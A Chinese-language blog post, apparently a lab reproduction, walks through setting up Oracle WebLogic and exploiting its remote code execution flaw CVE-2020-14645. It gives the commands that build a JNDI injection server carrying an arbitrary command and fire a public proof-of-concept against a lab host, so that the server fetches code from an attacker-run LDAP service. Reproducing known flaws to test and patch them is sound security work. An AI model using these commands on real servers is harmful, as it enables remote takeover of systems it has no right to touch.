Weblogic远程代码执行漏洞(CVE-2020-14645)复现
程序员文章站
2022-03-23 17:58:56
...
前言
WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。Oracle WebLogic Server存在远程代码执行漏洞。攻击者可利用漏洞实现远程代码执行。
环境搭建
下载地址:
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
java -jar fmw_12.2.1.4.0_wls_lite_generic.jar
进入配置向导,创建新域并勾选全部模板,直至安装完成
安装成功后,跳到base_domain目录下
cd C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain
运行startWebLogic.cmd
访问your-ip:7001/console
等待几秒后有登录界面即可
漏洞复现
JNDI工具下载地址
https://github.com/welk1n/JNDI-Injection-Exploit
使用JNDI工具搭建LDAP和HTTP服务,注意不能占用8180/1099/1389三个端口,修改要执行的命令后回车,会同时启动LDAP/RMI/HTTP三种服务,并且自动编译好带命令的class文件
mvn clean package -DskipTests
编译后
cd target/
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C [command] -A [address]
使用CVE-2020-14645漏洞验证工具
https://github.com/DSO-Lab/Weblogic_CVE-2020-14645
编译后运行mvn package
java -jar CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#Exploit http://192.168.111.131:7001
弹出
修复建议
升级到最新版